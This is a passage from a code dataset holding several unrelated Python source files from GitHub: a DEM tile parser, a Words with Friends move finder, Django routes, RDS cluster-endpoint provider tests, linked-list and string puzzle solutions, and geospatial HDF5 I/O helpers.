skipping...\")\n else:\n ds = read_raw_dem(file)\n ds.to_netcdf(\n path=ncfile,\n encoding=ds.encoding,\n )\n\n\ndef read_raw_dem(file: Path) -> xr.Dataset:\n \"\"\"Parse the downloaded DEM compressed tif files, to CF/Zampy standard dataset.\n\n Args:\n file: Path to the Prism DEM .tar archive.\n\n Returns:\n CF/Zampy formatted xarray Dataset\n \"\"\"\n basename = file.with_suffix(\"\").name\n\n tf = tarfile.open(file)\n tfdata = tf.extractfile(f\"{basename}/DEM/{basename}_DEM.tif\")\n\n if tfdata is None:\n raise ValueError(f\"File {file} contains no data\")\n\n # Reading bytestream is flakey. rasterio has a MemoryFile module to allow reading\n # in-memory GeoTIFF file data:\n da = xr.open_dataarray(MemoryFile(tfdata), engine=\"rasterio\") # type: ignore\n\n da = da.sortby([\"x\", \"y\"]) # sort the dims ascending\n da = da.isel(band=0) # get rid of band dim\n da = da.drop_vars([\"band\", \"spatial_ref\"]) # drop unnecessary coords\n ds = da.to_dataset()\n ds = ds.rename(\n {\n \"band_data\": \"elevation\",\n \"x\": \"longitude\",\n \"y\": \"latitude\",\n }\n )\n ds[\"elevation\"].attrs.pop(\"AREA_OR_POINT\") # Remove tif leftover attr\n\n # The prism DEM variable & coords already follow the CF/Zampy convention\n for variable in ds.variables:\n variable_name = str(variable) # Cast to string to please mypy.\n if variable_name != \"time\":\n ds[variable_name].attrs[\"units\"] = str(\n VARIABLE_REFERENCE_LOOKUP[variable_name].unit\n )\n ds[variable_name].attrs[\"description\"] = VARIABLE_REFERENCE_LOOKUP[\n variable_name\n ].desc\n\n ds.encoding = {\n \"elevation\": {\n \"zlib\": True,\n \"complevel\": 5,\n }\n }\n return ds\n\n\ndef get_archive_filenames(\n bounds: SpatialBounds, glo_number: Literal[\"30\", \"90\"]\n) -> list[str]:\n \"\"\"Get all valid Prism dataset archive filenames within given spatial bounds.\n\n Args:\n bounds: Spatial bounds to be used to determine which tiles need to be\n downloaded.\n glo_number: Number code of GLO. Either 30 or 90.\n\n Returns:\n List of filenames.\n \"\"\"\n step = 1\n\n locs = np.meshgrid(\n np.arange(start=bounds.south, stop=bounds.north, step=step),\n np.arange(start=bounds.west, stop=bounds.east, step=step),\n )\n lats = locs[0].flatten()\n lons = locs[1].flatten()\n\n fnames = [\"\"] * len(lats)\n\n if glo_number == \"30\":\n file_code_number = 10\n elif glo_number == \"90\":\n file_code_number = 30\n else:\n raise ValueError(\"Unknown glo_number.\")\n\n for i, (lat, lon) in enumerate(zip(lats, lons)):\n lat_ = int(lat // step * step)\n lon_ = int(lon // step * step)\n\n latstr = str(abs(lat_)).rjust(2, \"0\")\n lonstr = str(abs(lon_)).rjust(3, \"0\")\n latstr = f\"N{latstr}\" if lat_ >= 0 else f\"S{latstr}\"\n lonstr = f\"E{lonstr}\" if lon_ >= 0 else f\"W{lonstr}\"\n fnames[i] = f\"Copernicus_DSM_{file_code_number}_{latstr}_00_{lonstr}_00.tar\"\n\n return get_valid_filenames(fnames)\n\n\ndef get_valid_filenames(filenames: list[str]) -> list[str]:\n \"\"\"Returns a new list with only the valid filenames.\"\"\"\n valid_filenames = \"\"\n\n for valid_name_file in VALID_NAME_FILES:\n with gzip.open(valid_name_file, \"rb\") as f:\n valid_filenames += f.read().decode(\"utf-8\")\n\n valid_names = []\n for fname in filenames:\n if fname in valid_filenames:\n valid_names.append(fname)\n return valid_names\n","repo_name":"EcoExtreML/zampy","sub_path":"src/zampy/datasets/prism_dem.py","file_name":"prism_dem.py","file_ext":"py","file_size_in_byte":10082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11753913593","text":"'''\nFunctions to calculate legal plays in Words with Friends. The approach is\nas follows:\n\n1) for each position on the board, find all possible lengths of words which\nbegin on that square and which connect to the currently played tiles.\n\n2) For each such length, find all words you can play that fill in a legal word\nof that length starting in that position and which make a legal word in that\nrow.\n\n3) For each tile you put down, check to make sure that the vertical words\nformed are legal plays.\n'''\n\nimport re\nfrom game_constants_wwf import *\nfrom game2 import *\n\n# The variables imported from board_state are BOARD, HAND and HAND_SIZE\n# The variables imported from game_constants_wwf are WORD_LIST_BY_LEN,\n# WORD_LIST_BY_HASH, TILE_VALUES, WORD_SCORE_MULTIPLIER,\n# LETTER_SCORE_MULTIPLIER and h.\n\ndef allowable_lengths(position):\n '''\n Returns a list of the possible lengths that a word beginning at position\n can have. Counts number of blank spaces to make sure you have enough tiles\n in hand to form the word.\n '''\n\n i, j = position\n row_length = len(BOARD[i])\n if j != 0 and BOARD[i][j-1] != ' ':\n return []\n else:\n count = 0\n if BOARD[i][j] == ' ':\n count += 1\n acceptable_lengths = []\n for k in range(j+1, row_length):\n if BOARD[i][k] == ' ':\n count += 1\n if k == row_length-1:\n if count:\n acceptable_lengths.append(k-j+1)\n break\n if BOARD[i][k+1] == ' ':\n if count:\n acceptable_lengths.append(k-j+1)\n if count == HAND_SIZE:\n break\n return [length for length in acceptable_lengths\n if has_neighbor(position, length)]\n\n\ndef has_neighbor(position, length):\n '''Boolean check whether a word beginning at position with this length will\n connect to the already played tiles on the board.'''\n\n i, j = position\n if (j != 0 and BOARD[i][j-1] != ' '\n or j != len(BOARD)-1 and BOARD[i][j+1] != ' '):\n return True\n for k in range(length):\n if (i != 0 and BOARD[i-1][j+k] != ' '\n or i != len(BOARD[j+k])-1 and BOARD[i+1][j+k] != ' '):\n return True\n return False\n\n\ndef find_legal_plays(position, length):\n '''Return a list of the words of this length starting at position which\n can be played horizontally given the current BOARD state and your current\n HAND and for which all the vertically formed words are also legal.'''\n\n i, j = position\n hand_tiles = '['+''.join(HAND)+']'\n re_pattern = re.compile(\n '^'+''.join(map(lambda x: hand_tiles if x == ' ' else x,\n BOARD[i][j:j+length]))+'$')\n\n def enough_letters_checker(word):\n '''Boolean check if the word can be played with tiles in hand.'''\n\n my_letters = BOARD[i][j:j+length]+HAND\n return all([word.count(ch) <= my_letters.count(ch) for ch in set(word)])\n\n return [word for word in WORD_LIST[length]\n if re_pattern.match(word)\n and vertical_word_checker(position, word)\n and enough_letters_checker(word)]\n\n\ndef vertical_word_checker(position, word):\n '''Boolean check if the vertical words formed by playing word at\n position are in the word list.'''\n\n i, j = position\n for k in range(len(word)):\n if BOARD[i][j+k] == ' ':\n column = [BOARD[m][j+k] for m in range(len(BOARD))]\n column[i] = word[k]\n if not all([len(word) == 1 or word in WORD_LIST[len(word)]\n for word in ''.join(column).split()]):\n return False\n return True\n\n\ndef score_play(position, word):\n '''Return the score for playing the given word starting at\n position.'''\n\n def iter_scorer(nexter, position, word, multiplier, score):\n '''Iterative form of the function. Schemey.'''\n\n if len(word) == 0:\n return multiplier*score\n return iter_scorer(\n nexter,\n nexter(position),\n word[1:],\n multiplier*word_score(position),\n score+letter_score(position)*tile_score(word[0]))\n i, j = position\n score = 0\n score += iter_scorer(lambda x: (x[0], x[1]+1), position, word, 1, 0)\n for k in [m for m in range(len(word)) if BOARD[i][j+m] == ' ']:\n beg = i\n end = i\n while beg != 0 and BOARD[beg-1][j+k] != ' ':\n beg -= 1\n while end != len(BOARD)-1 and BOARD[end+1][j+k] != ' ':\n end += 1\n if beg != end:\n column = [BOARD[m][j+k] for m in range(len(BOARD))]\n column[i] = word[k]\n side_word = ''.join([column[m] for m in range(beg, end+1)])\n score += iter_scorer(\n lambda x: (x[0]+1, x[1]), (beg, j+k), side_word, 1, 0)\n return score\n\n\ndef letter_score(position):\n '''Double/Triple Letter Score multiplier.'''\n\n i, j = position\n if BOARD[i][j] != ' ':\n return 1\n return LETTER_SCORE_MULTIPLIER.get(position, 1)\n\n\ndef word_score(position):\n '''Double/Triple Word Score multiplier.'''\n\n i, j = position\n if BOARD[i][j] != ' ':\n return 1\n return WORD_SCORE_MULTIPLIER.get(position, 1)\n\n\ndef tile_score(tile):\n '''Point value for the letter ch.'''\n\n return TILE_VALUES[tile]\n\n\ndef list_plays_and_scores(position):\n '''Return a list of tuples of the form (score, word, position) which\n enumerate the possible legal horizontal plays and the corresponding\n score.'''\n\n play_score_list = []\n for length in allowable_lengths(position):\n play_score_list += [(score_play(position, play), play, position)\n for play in find_legal_plays(position, length)]\n return play_score_list\n\ndef flip_board():\n '''Persistently flip global BOARD. Enables the reuse of the above code to\n calculate vertical plays as well.'''\n\n global BOARD\n BOARD = [[BOARD[i][j] for i in range(len(BOARD))]\n for j in range(len(BOARD))]\n","repo_name":"dodgejoel/words_solver","sub_path":"play_finder_wwf.py","file_name":"play_finder_wwf.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25416791963","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom .views import editOwner, index, newUser, owner, vet, newVeterinary, logoutview, official, editVet, addPetCase\n\nurlpatterns = [\n path('', index, name=\"index\"),\n path('newUser/', newUser, name='newUser'),\n path('newVeterinary/', newVeterinary, name='newVeterinary'),\n path('Official/', official, name=\"official\"),\n path('editOwner/', editOwner, name=\"editOwner\"),\n path('Owner/', owner, name=\"owner\"),\n path('Vet/', vet, name=\"vet\"),\n path('addPetCase/', addPetCase, name=\"addPetCase\"),\n path('editVet/', editVet, name=\"editVet\"),\n path('logout/', logoutview, name=\"logout\"),\n path('login/', index, name=\"login\"),\n\n]\n","repo_name":"luhemapo/ProyectoFinalProg2","sub_path":"proyectofinalprog2/cuatropatas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18025812527","text":"import uuid\nimport botocore\nfrom botocore.stub import Stubber, ANY\nfrom db_cluster_endpoint_provider import DBClusterEndpointProvider\n\nprovider = DBClusterEndpointProvider()\nprovider.sleep_period_in_seconds = 0.1\n\ndef test_create_endpoint():\n\n request = Request(\n \"Create\",\n properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance1\"],\n },\n )\n rds = botocore.session.get_session().create_client(\n \"rds\", region_name=\"eu-central-1\"\n )\n stubber = Stubber(rds)\n stubber.add_response(\n \"create_db_cluster_endpoint\",\n CreateDbClusterEndpointReponse(request),\n request[\"ResourceProperties\"],\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"creating\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"available\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.activate()\n provider.rds = rds\n\n response = provider.handle(request, ())\n assert response[\"Status\"] == \"SUCCESS\", response[\"Reason\"]\n stubber.assert_no_pending_responses()\n\ndef test_update_endpoint():\n\n request = Request(\n \"Update\",\n properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance2\"],\n },\n old_properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance1\"],\n },\n )\n rds = botocore.session.get_session().create_client(\n \"rds\", region_name=\"eu-central-1\"\n )\n stubber = Stubber(rds)\n stubber.add_response(\n \"modify_db_cluster_endpoint\",\n CreateDbClusterEndpointReponse(request),\n {'DBClusterEndpointIdentifier': 'readers', 'StaticMembers': ['instance2']},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"modifying\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"available\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.activate()\n provider.rds = rds\n\n response = provider.handle(request, ())\n assert response[\"Status\"] == \"SUCCESS\", response[\"Reason\"]\n stubber.assert_no_pending_responses()\n\ndef test_invalid_update_endpoint():\n\n request = Request(\n \"Update\",\n properties = {\n \"DBClusterIdentifier\": \"aurora-2\",\n \"DBClusterEndpointIdentifier\": \"readers-1\",\n \"EndpointType\": \"WRITER\",\n \"StaticMembers\": [\"instance2\"],\n \"Tags\": [{\"Key\": \"Name\", \"Value\": \"writer\"}]\n },\n old_properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance1\"],\n },\n )\n rds = botocore.session.get_session().create_client(\n \"rds\", region_name=\"eu-central-1\"\n )\n stubber = Stubber(rds)\n stubber.activate()\n provider.rds = rds\n\n response = provider.handle(request, ())\n assert response[\"Status\"] == \"FAILED\", response[\"Reason\"]\n assert response[\"Reason\"] == 'these properties cannot be updated: DBClusterEndpointIdentifier, DBClusterIdentifier, Tags'\n stubber.assert_no_pending_responses()\n\ndef test_delete_endpoint():\n\n request = Request(\n \"Delete\",\n properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance2\"],\n },\n )\n rds = botocore.session.get_session().create_client(\n \"rds\", region_name=\"eu-central-1\"\n )\n stubber = Stubber(rds)\n stubber.add_response(\n \"delete_db_cluster_endpoint\",\n CreateDbClusterEndpointReponse(request),\n {'DBClusterEndpointIdentifier': 'readers'},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"deleting\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, status=None),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.activate()\n provider.rds = rds\n\n response = provider.handle(request, ())\n assert response[\"Status\"] == \"SUCCESS\", response[\"Reason\"]\n stubber.assert_no_pending_responses()\n\n\n\nclass Request(dict):\n def __init__(self, request_type, properties:dict, old_properties:dict = {}, physical_resource_id=None):\n request_id = \"request-%s\" % uuid.uuid4()\n self.update(\n {\n \"RequestType\": request_type,\n \"ResponseURL\": \"https://httpbin.org/put\",\n \"StackId\": \"arn:aws:cloudformation:us-west-2:EXAMPLE/stack-name/guid\",\n \"RequestId\": request_id,\n \"ResourceType\": \"Custom::DBClusterEndpoint\",\n \"LogicalResourceId\": \"Endpoint\",\n \"ResourceProperties\": properties,\n\n }\n )\n if physical_resource_id:\n self[\"PhysicalResourceId\"] = physical_resource_id\n elif request_type != \"Create\":\n self[\"PhysicalResourceId\"] = f\"arn:aws:rds:eu-central-1:123456789012:{properties['DBClusterIdentifier']}:{properties['DBClusterEndpointIdentifier']}\"\n\n if request_type == \"Update\":\n self[\"OldResourceProperties\"] = old_properties if old_properties else {}\n\n\nclass CreateDbClusterEndpointReponse(dict):\n def __init__(self, request):\n status = {\"Create\": \"creating\", \"Update\": \"modifying\", \"Delete\": \"deleting\"}\n\n self[\"ResponseMetadata\"] = {\n \"RequestId\": request[\"RequestId\"],\n \"HTTPStatusCode\": 200,\n \"HTTPHeaders\": {\n \"x-amzn-requestid\": \"2c7bd3fe-730c-4d24-b9a5-1942193a091a\",\n \"content-type\": \"text/xml\",\n \"content-length\": \"275\",\n \"date\": \"Sat, 16 Nov 2019 17:58:29 GMT\",\n },\n \"RetryAttempts\": 0,\n }\n properties = request[\"ResourceProperties\"]\n self.update(\n {\n \"DBClusterEndpointIdentifier\": properties[\"DBClusterEndpointIdentifier\"],\n \"DBClusterIdentifier\": properties[\"DBClusterIdentifier\"],\n \"DBClusterEndpointResourceIdentifier\": f\"request['DBClusterEndpointIdentifier']-ANPAJ4AE5446DAEXAMPLE\",\n \"Endpoint\": f\"{properties['DBClusterEndpointIdentifier']}.{properties['DBClusterIdentifier']}.eu-central-1.rds.amazonaws.com\",\n \"Status\": status[request[\"RequestType\"]],\n \"EndpointType\": \"CUSTOM\",\n \"CustomEndpointType\": properties[\"EndpointType\"],\n \"StaticMembers\": properties.get(\"StaticMembers\", []),\n \"ExcludedMembers\": properties.get(\"ExcludedMembers\", []),\n \"DBClusterEndpointArn\": f\"arn:aws:rds:eu-central-1:123456789012:{properties['DBClusterIdentifier']}:{properties['DBClusterEndpointIdentifier']}\",\n }\n )\n\n\nclass DescribeDBClusterEndpointReponse(dict):\n def __init__(self, request, status=None):\n self[\"ResponseMetadata\"] = {\n \"RequestId\": request[\"RequestId\"],\n \"HTTPStatusCode\": 200,\n \"HTTPHeaders\": {\n \"x-amzn-requestid\": \"2c7bd3fe-730c-4d24-b9a5-1942193a091a\",\n \"content-type\": \"text/xml\",\n \"content-length\": \"275\",\n \"date\": \"Sat, 16 Nov 2019 17:58:29 GMT\",\n },\n \"RetryAttempts\": 0,\n }\n properties = request[\"ResourceProperties\"]\n if status:\n self.update(\n {\n \"DBClusterEndpoints\": [\n {\n \"DBClusterIdentifier\": properties[\"DBClusterIdentifier\"],\n \"Endpoint\": f\"{properties['DBClusterEndpointIdentifier']}.{properties['DBClusterIdentifier']}.eu-central-1.rds.amazonaws.com\",\n \"Status\": status,\n \"EndpointType\": properties[\"EndpointType\"],\n }\n ]\n }\n )\n else:\n self.update({ \"DBClusterEndpoints\": []})\n","repo_name":"binxio/cfn-db-cluster-endpoint-provider","sub_path":"tests/test_db_cluster_endpoint_provider.py","file_name":"test_db_cluster_endpoint_provider.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18988265006","text":"'''\nDescription: \nAuthor: Tjg\nDate: 2021-06-08 20:48:32\nLastEditTime: 2021-06-08 22:21:18\nLastEditors: Please set LastEditors\n'''\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def __repr__(self):\n print_string = []\n \n print_string.append(str(self.val))\n p = self.next\n while p != None:\n print_string.append(str(p.val))\n p = p.next\n return \"->\".join(print_string)\n\n# 迭代法 不对称\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n dummy = ListNode(0,l1)\n prev = dummy\n while l1 != None and l2 != None:\n # print(\"pre\",dummy.next,prev,l1,l2)\n if l1.val >= l2.val:\n prev.next = l2\n prev = prev.next\n l2 = l2.next\n prev.next = l1\n else:\n l1 = l1.next\n prev = prev.next\n # print(\"pas\",dummy.next)\n\n if l1 == None: \n# 是prev.next 而不是l1,因为l1只是个指针,仅仅是l1指针指向\n# 新的地址,而没有把l1,l2连接起来\n prev.next= l2 \n return dummy.next\n\n# 迭代法 对称\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n prehead = ListNode(-1)\n\n prev = prehead\n while l1 and l2:\n if l1.val <= l2.val:\n prev.next = l1\n l1 = l1.next\n else:\n prev.next = l2\n l2 = l2.next \n prev = prev.next\n\n # 合并后 l1 和 l2 最多只有一个还未被合并完,我们直接将链表末尾指向未合并完的链表即可\n prev.next = l1 if l1 is not None else l2\n\n return prehead.next\n\n# 递归法\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n if l1 is None:\n return l2\n elif l2 is None:\n return l1\n elif l1.val < l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\nl1 = ListNode(3)\n# l1.next = ListNode(2)\n# l1.next.next = ListNode(4)\n\nl2 = ListNode(2)\n# l2.next = ListNode(3)\n# l2.next.next = ListNode(4)\nprint(l1,l2)\ns1 = Solution()\nans = s1.mergeTwoLists(l1,l2)\nprint(ans)\n","repo_name":"planetInGalaxy/LeetCode","sub_path":"剑指offer/25合并两个有序链表.py","file_name":"25合并两个有序链表.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"9401882509","text":"import numpy as np\nimport xarray as xr\nimport h5py\nfrom collections import namedtuple\n\nfrom . import DGGS\n\nBandInfo = namedtuple('BandInfo', ['dtype', 'nodata', 'block', 'name'])\nGeoFileInfo = namedtuple('GeoFileInfo', ['crs', 'affine', 'shape', 'bands'])\n\n\ndef _h5_parse_structure(f):\n sites = {}\n bands = []\n\n def valid_address(addr: str):\n code, *digits = addr\n return (code in 'SNOPQR' and\n set(digits).issubset('012345678')) # TODO: assumes 3x3 dggs\n\n def add(addr, shape):\n v = sites.get(addr)\n if v and v != shape:\n raise RuntimeError('Incompatible shapes detected')\n else:\n sites[addr] = shape\n\n for band, g in f.items():\n if not isinstance(g, h5py.Group):\n continue\n\n count = 0\n\n for addr, ds in g.items():\n if valid_address(addr) and isinstance(ds, h5py.Dataset):\n add(addr, ds.shape)\n count += 1\n\n if count > 0:\n bands.append(band)\n\n return bands, sites\n\n\ndef h5_load(fname, bands=None, dg=DGGS()):\n\n def read_bands(f, addr, shape, bands):\n h, w = shape[:2]\n roi = dg.ROI(addr, w, h)\n coords = dg.xy_from_roi(roi)[::-1]\n\n dims = ('y', 'x')\n\n def read(band):\n path = band + '/' + addr\n ds = f.get(path)\n if ds is None:\n # TODO: need to know dtype and nodata value for the band\n raise NotImplementedError(\"Currently only support homogeneous data across bands\")\n else:\n if ds.shape != shape:\n raise NotImplementedError(\"Currently only support homogeneous data across bands\")\n\n dd = np.empty(shape, dtype=ds.dtype)\n ds.read_direct(dd)\n\n # TODO: nodata\n return xr.DataArray(dd,\n dims=dims,\n name=band,\n coords=coords,\n attrs=dict(addr=addr))\n\n return xr.Dataset({band: read(band) for band in bands},\n attrs=dict(addr=addr))\n\n with h5py.File(fname, 'r') as f:\n bands_, sites = _h5_parse_structure(f)\n if bands is None:\n bands = bands_\n else:\n # TODO: verify that requested bands are present in a file\n pass\n\n return [read_bands(f, addr, shape, bands)\n for (addr, shape) in sites.items()]\n\n\nclass H5Writer(object):\n def __init__(self, fname, chunk_size=3**5):\n self.fname = fname\n self._chunk_size = chunk_size\n self._f = None\n self._opts = dict(compression='gzip',\n shuffle=True)\n\n def _chunks(self, shape):\n a = min(shape[0], self._chunk_size)\n b = min(shape[1], self._chunk_size)\n return (a, b) + shape[2:]\n\n def __enter__(self):\n self._f = h5py.File(self.fname, 'w')\n return self\n\n def __exit__(self, t, v, traceback):\n self._f.close()\n self._f = None\n\n def __call__(self, addr, band, data, nodata=None):\n f = self._f\n g = f.get(band)\n\n if g is None:\n g = f.create_group(band)\n elif not isinstance(g, h5py.Group):\n raise IOError('TODO: fix error message')\n\n if not isinstance(addr, str):\n addr = str(addr)\n\n ds = g.create_dataset(addr,\n data=data,\n chunks=self._chunks(data.shape),\n fillvalue=nodata,\n **self._opts)\n if ds.ndim >= 2:\n ds.dims[0].label = 'y'\n ds.dims[1].label = 'x'\n\n\ndef h5_save(fname, datasets, chunk_size=3**5):\n if not isinstance(datasets, (tuple, list)):\n datasets = [datasets]\n\n with H5Writer(fname, chunk_size=chunk_size) as write:\n for ds in datasets:\n assert hasattr(ds, 'addr')\n\n for name, da in ds.data_vars.items():\n nodata = da.attrs.get('nodata', None)\n write(ds.addr, name, da.values, nodata=nodata)\n\n return True\n\n\ndef slurp(fname, proc=None, keep_eol=False):\n import gzip\n import lzma\n\n _open = open\n\n if fname.endswith('.gz'):\n _open = gzip.open\n if fname.endswith('.xz'):\n _open = lzma.open\n\n def mk_proc(proc):\n maybe_strip = (lambda s: s.rstrip('\\n')) if keep_eol is False else (lambda s: s)\n\n if proc is None:\n return maybe_strip\n else:\n return lambda s: proc(maybe_strip(s))\n\n with _open(fname, 'rt') as f:\n return list(map(mk_proc(proc), f.readlines()))\n\n\ndef dump_text(txt, fname=None):\n import gzip\n import lzma\n import sys\n\n eol = '\\n'\n\n def write_to(txt, f):\n if isinstance(txt, str):\n f.write(txt)\n else:\n f.writelines(map(lambda x: str(x) + eol, txt))\n\n if fname is None:\n write_to(txt, sys.stdout)\n return True\n\n _open = open\n\n if fname.endswith('.gz'):\n _open = gzip.open\n if fname.endswith('.xz'):\n _open = lzma.open\n\n with _open(fname, 'wt') as f:\n write_to(txt, f)\n\n return True\n\n\ndef load_shapes(fname, pred=lambda _: True, with_attributes=True):\n import fiona\n from shapely.geometry import shape\n\n def mk_shape(g):\n sh = shape(g['geometry'])\n if with_attributes:\n sh.attrs = g['properties'].copy()\n return sh\n\n with fiona.open(fname, 'r') as f:\n shapes = [mk_shape(g)\n for g in f.values() if pred(g)]\n\n return shapes, f.crs\n\n\ndef load_polygons(fname):\n return load_shapes(fname, lambda g: g['geometry']['type'] == 'Polygon')\n\n\ndef save_png(fname, im, bgr=False, binary=None):\n import cv2\n\n if im.ndim == 3 and bgr is False:\n _, _, nc = im.shape\n if nc == 3:\n im = im[:, :, ::-1] # Convert to BGR\n elif nc == 4:\n im = im[:, :, [2, 1, 0, 3]] # Convert to BGRA\n\n png_opts = (cv2.IMWRITE_PNG_COMPRESSION, 9)\n\n if im.dtype == np.bool:\n im = im.astype('uint8')\n binary = True if binary is None else binary\n\n if binary:\n png_opts = png_opts + (cv2.IMWRITE_PNG_BILEVEL, 1)\n\n return cv2.imwrite(fname, im, png_opts)\n\n\ndef geo_file_info(fname, band_names=None):\n import rasterio\n\n def band_name(idx):\n if band_names is None:\n return None\n return band_names[idx]\n\n def info(f):\n def band_info(idx):\n return BandInfo(f.dtypes[idx], f.nodatavals[idx], f.block_shapes[idx], band_name(idx))\n\n bands = [band_info(i) for i in range(f.count)]\n return GeoFileInfo(f.crs.to_dict(), f.affine, f.shape, bands)\n\n if isinstance(fname, str):\n with rasterio.open(fname, 'r') as f:\n return info(f)\n return info(fname)\n\n\ndef geo_load(fname, fix_nodata=True, band_names=None):\n import rasterio\n\n def bad_nodata(band):\n if np.dtype(band.dtype).kind == 'f':\n if (band.nodata is not None) and (not np.isnan(band.nodata)):\n return True\n return False\n\n def fix_band_info(band):\n T = type(band)\n band = band._asdict()\n band['nodata'] = np.nan\n return T(**band)\n\n with rasterio.open(fname, 'r') as f:\n info = geo_file_info(f, band_names=band_names)\n bands = []\n\n for i, band in enumerate(info.bands):\n data = f.read(i+1)\n\n if fix_nodata and bad_nodata(band):\n data[data == band.nodata] = np.nan\n info.bands[i] = fix_band_info(band)\n\n bands.append(data)\n\n return info, bands\n","repo_name":"GeoscienceAustralia/dggs-pilot","sub_path":"dggs/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"29301119685","text":"import sys\n\nx = int(sys.stdin.readline().strip())\n\ndef get_dic(x):\n res = []\n for i in range(1, x):\n for j in range(1, x):\n if i+j <= x:\n res.append([i,j])\n result = []\n for m in range(len(res)): \n [i,j] = res[m]\n num = get_index(i,j,x)\n if num != -1:\n result.append(num+1)\n\n dic = {}\n for i in result:\n if i not in dic:\n dic[i] = 1\n else:\n dic[i] += 1\n return dic\n\n\ndef get_index(i,j, x):\n alist = [i, j]\n while j < x:\n i, j = j, i+j\n alist.append(j)\n if x in alist:\n xindex = alist.index(x)\n return xindex\n else:\n return -1\n\ndic = get_dic(x)\nkeys = []\nfor key in dic.keys():\n keys.append(key)\nkeys.sort()\nfor i in keys:\n print(str(i) + ' ' + str(dic[i]))","repo_name":"mantianwuming/work_test","sub_path":"work/sougou_test1_outoftime.py","file_name":"sougou_test1_outoftime.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"25208548380","text":"\"\"\"\nhttps://leetcode.com/problems/isomorphic-strings/description/?envType=study-plan&id=level-1\n\n12/12/2022, 12/13/2022\n\narrays\n\n--- PROMPT ---\n\nGiven two strings s and t, determine if they are isomorphic.\n\nTwo strings s and t are isomorphic if the characters in s can be replaced to get t.\n\nAll occurrences of a character must be replaced with another character while preserving the order of characters. No two characters may map to the same character, but a character may map to itself.\n--- LESSONS ---\nyou can run for loops, lengths, indexes on strings@\n\n--- QUESTIONS ---\n\n--- PSEUDOCODE ---\nstrings are isomorphic if they are isomorphic on both directions\nBuild a map that maps the changes between strings (do this as you loop thru strings)\n\nif you notice that the character is in the map, and it DOESN'T map to the corresponding char, then you return false\notherwise, keep building your map\n\nif you get thru the entire list without triggering the False return, then return True\n\n\"\"\"\n\n\n# --- MY SOLUTION ---\nclass Solution(object):\n def isIsomorphic(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n\n \"\"\"\n # build the map assosications between the strings\n mapST = {}\n mapTS = {}\n# you can loop thru two strings of same length at the same time using zip()\n# for c1, c2 in zip(s, t)\n\n for i in range(len(s)):\n c1 = s[i]\n c2 = t[i]\n\n # need to check if the varied mapping (returning false)\n # we need to do this check \n if ((c1 in mapST and mapST[c1] != c2) or (c2 in mapTS and mapTS[c2] != c1)):\n return False\n\n # the order of where you put this matters (it can't be placed before the if statement)\n mapST[c1] = c2\n mapTS[c2] = c1\n return True\n\n\"\"\"\n My solution at first:\n Tricky solution:\n manipulate one string against the other string\n and then in the end, check if the two strings are the same\n\n failing case:\n s = 'badc', t = 'baba'\n\n my original solution... figured this out on my own, but it didnt work\n if len(s) != len(t):\n return False\n\n rev_t = t\n for i in range(len(t)):\n prefix_t = rev_t[:i]\n postfix_t = rev_t[i:]\n postfix_t = postfix_t.replace(t[i],s[i])\n rev_t = prefix_t + postfix_t\n\n rev_s = s\n for i in range(len(s)):\n prefix = rev_s[:i]\n postfix = rev_s[i:]\n postfix = postfix.replace(s[i],t[i])\n rev_s = 